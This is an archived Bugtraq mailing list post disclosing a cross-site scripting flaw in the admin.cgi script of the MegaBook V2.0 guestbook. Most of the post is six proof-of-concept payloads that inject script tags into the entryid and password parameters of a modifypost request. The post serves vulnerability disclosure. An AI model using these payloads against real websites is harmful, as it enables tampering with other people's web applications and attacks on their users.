Home page logo
/

bugtraq logo Bugtraq mailing list archives

MegaBook V2.0 - Cross Site Scripting Exploit
From: Spy Hat <spyhat () spyhat com>
Date: 5 May 2005 10:45:51 -0000



The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the 
attacker to modify the post in the guestbook. The affected scripts is admin.cgi 

URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) 

I have tested the script with the following query:

?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;

I have also tested the script with theses POST variables:

action=modifypost&entryid=66&password=&lt;script&gt;alert('wvs-xss-magic-string-188784308');&lt;/script&gt;

action=modifypost&entryid=66&password='>&lt;script&gt;alert('wvs-xss-magic-string-486624156');&lt;/script&gt;

action=modifypost&entryid=66&password=">&lt;script&gt;alert('wvs-xss-magic-string-1852691616');&lt;/script&gt;

action=modifypost&entryid=66&password=>&lt;script&gt;alert('wvs-xss-magic-string-429380114');&lt;/script&gt;

action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;


Yours,
SpyHat


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]